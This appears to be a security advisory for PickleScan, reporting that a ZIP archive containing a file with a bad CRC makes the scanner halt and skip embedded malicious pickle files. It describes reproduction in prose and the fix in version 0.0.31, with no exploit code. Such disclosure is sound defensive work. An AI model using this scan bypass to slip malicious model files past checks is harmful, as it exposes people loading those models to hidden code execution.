PickleScan ZIP Archive Scanning Component Improper CRC Handling Vulnerability

A vulnerability allowing remote attackers to bypass security scans in the ZIP archive scanning component of PickleScan has been identified. This issue arises from improper handling of files with bad Cyclic Redundancy Check (CRC) values. When such a file is encountered, the scanner halts and fails to analyze the archive for malicious pickle files. As a result, crafted ZIP archives can be used to deliver harmful code by exploiting this scanning oversight.

Impact

Exploitation of this vulnerability allows for the successful bypass of security scans, enabling the distribution and execution of malicious code without detection by PickleScan.

Reproduction

To reproduce this vulnerability, download a PyTorch model known to have a bad CRC, such as one from the JinaAI embeddings collection. Then, scan the corrupted ZIP file with PickleScan. The tool will return an error about the ZIP file's integrity but will not scan for valid pickle files, missing any embedded malicious content.

Remediation

Users can update to PickleScan version 0.0.31, which addresses this vulnerability by improving ZIP file handling to avoid failing on bad CRC checks.